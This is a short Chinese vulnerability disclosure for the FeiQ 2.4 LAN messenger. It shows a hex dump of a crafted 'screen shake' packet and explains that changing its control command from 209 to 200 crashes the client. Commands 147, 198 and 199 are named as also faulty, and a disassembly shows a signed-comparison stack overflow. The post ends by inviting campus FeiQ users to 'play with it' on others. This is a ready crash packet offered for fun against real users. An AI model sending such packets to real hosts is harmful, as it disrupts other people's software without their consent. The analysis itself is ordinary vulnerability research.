Author: instruder of Code Audit Labs of vulnhunt.com
version:飞秋2.4 修正版

//闪屏振动 数据包

代码:
00136A70  31 5F 6C 62 74 34 5F 30 23 31 33 31 23 30 30 31  1_lbt4_0#131#001
00136A80  42 32 34 35 37 30 39 42 31 23 30 23 30 23 30 3A B245709B1#0#0#0:
00136A90  31 33 31 32 34 39 31 30 31 39 3A 61 73 6D 3A 41  1312491019:asm:A
00136AA0  53 4D 4B 45 52 4E 45 2D 36 30 44 46 36 46 3A 32  SMKERNE-60DF6F:2
00136AB0  30 39                                                                         09

asm:ASMKERNE-60DF6F 是我的主机名,冒号后面是发送的控制命令
将209改成200 即可导致飞秋崩溃


同时控制命令
147
198
199
都有问题

发送200命令后,导致飞秋堆栈溢出了 ,但是貌似源不可控.


漏洞代码:
代码:
00490D66    8B8424 20400000 mov     eax, dword ptr [esp+4020]
00490D6D    C78424 14400000>mov     dword ptr [esp+4014], 0
00490D78    3D 00400000     cmp     eax, 4000
00490D7D    7E 18           jle     short 00490D97//有符号比较..
00490D7F    8D4C24 04       lea     ecx, dword ptr [esp+4]
00490D83    C78424 14400000>mov     dword ptr [esp+4014], -1
00490D8E    E8 3D3DF7FF     call    00404AD0
00490D93    33C0            xor     eax, eax
00490D95    EB 63           jmp     short 00490DFA
00490D97    8BC8            mov     ecx, eax
00490D99    56              push    esi
00490D9A    8BB424 20400000 mov     esi, dword ptr [esp+4020]
00490DA1    8BD1            mov     edx, ecx
00490DA3    8D7C24 10       lea     edi, dword ptr [esp+10]
00490DA7    6A 00           push    0
00490DA9    C1E9 02         shr     ecx, 2
00490DAC    F3:A5           rep     movs dword ptr es:[edi], dword ptr [esi]//挂了..
00490DAE    8BCA            mov     ecx, edx
00490DB0    6A 00           push    0
00490DB2    83E1 03         and     ecx, 3
00490DB5    6A 22           push    22
00490DB7    F3:A4           rep     movs byte ptr es:[edi], byte ptr [esi]




以前找的 发出来校园里面用飞秋的兄弟可以玩玩 呵呵